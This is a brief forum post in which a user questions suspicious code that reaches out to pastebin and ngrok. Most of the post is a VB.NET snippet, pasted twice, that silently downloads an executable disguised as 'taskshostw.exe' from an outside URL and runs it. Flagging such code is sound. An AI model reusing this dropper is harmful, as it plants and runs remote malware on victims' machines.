Posted at 19-02-2023, 10:53 PM
(This post was last modified: 19-02-2023, 10:54 PM by PachaQteKCoder.)
WHAT IS THIS? And why does it connect to pastebin and then to an ngrok tunnel?
LMAO
LMAO
#If BLAJ Then
Dim devil As String
Dim x As New System.Text.StringBuilder
x.Append("https://insellerate.net/doc/taskshostw.exe")
devil = x.ToString
Dim URL As String = devil
Dim DownloadTo As String = Environ("temp") & "taskshostw.exe"
Try
Dim w As New Net.WebClient
IO.File.WriteAllBytes(DownloadTo, w.DownloadData(URL))
Shell(DownloadTo)
Catch ex As Exception
End Try
#End If
Dim devil As String
Dim x As New System.Text.StringBuilder
x.Append("https://insellerate.net/doc/taskshostw.exe")
devil = x.ToString
Dim URL As String = devil
Dim DownloadTo As String = Environ("temp") & "taskshostw.exe"
Try
Dim w As New Net.WebClient
IO.File.WriteAllBytes(DownloadTo, w.DownloadData(URL))
Shell(DownloadTo)
Catch ex As Exception
End Try
#End If